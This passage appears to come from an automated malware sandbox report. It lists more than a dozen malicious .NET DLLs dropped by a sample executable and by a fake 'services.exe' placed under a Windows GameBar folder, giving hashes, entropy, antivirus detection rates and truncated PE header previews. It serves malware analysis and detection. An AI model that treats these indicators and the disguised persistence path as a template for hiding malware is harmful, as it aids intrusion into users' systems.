                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\HkLrMVoC.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):294912
                                                                                                                              Entropy (8bit):6.010605469502259
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                              C:\Users\user\Desktop\HtvJqEPI.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):36352
                                                                                                                              Entropy (8bit):5.668291349855899
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\KInsUcJl.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):50176
                                                                                                                              Entropy (8bit):5.723168999026349
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\MgNITBew.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):342528
                                                                                                                              Entropy (8bit):6.170134230759619
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\MoHhbGed.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):69632
                                                                                                                              Entropy (8bit):5.932541123129161
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                              C:\Users\user\Desktop\NPGqEfku.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):85504
                                                                                                                              Entropy (8bit):5.8769270258874755
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                              C:\Users\user\Desktop\OquQxqjY.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):41472
                                                                                                                              Entropy (8bit):5.6808219961645605
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\PFcqhLrW.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33792
                                                                                                                              Entropy (8bit):5.541771649974822
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\RbOZahUq.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):50176
                                                                                                                              Entropy (8bit):5.723168999026349
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\SYphwgjk.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):70144
                                                                                                                              Entropy (8bit):5.909536568846014
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\UAeHorhP.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):342528
                                                                                                                              Entropy (8bit):6.170134230759619
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\WPgYDdje.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39936
                                                                                                                              Entropy (8bit):5.660491370279985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                              MD5:240E98D38E0B679F055470167D247022
                                                                                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\YALoKruW.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):28160
                                                                                                                              Entropy (8bit):5.570953308352568
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                              MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                              SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                              SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                              SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\ZeYGhBeG.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):34816
                                                                                                                              Entropy (8bit):5.636032516496583
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\bCyXfazS.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33792
                                                                                                                              Entropy (8bit):5.541771649974822
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\dVPxoyeA.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):28160
                                                                                                                              Entropy (8bit):5.570953308352568
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                              MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                              SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                              SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                              SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\eJTFZLay.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32256
                                                                                                                              Entropy (8bit):5.631194486392901
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\fxzonGoL.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):41472
                                                                                                                              Entropy (8bit):5.6808219961645605
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
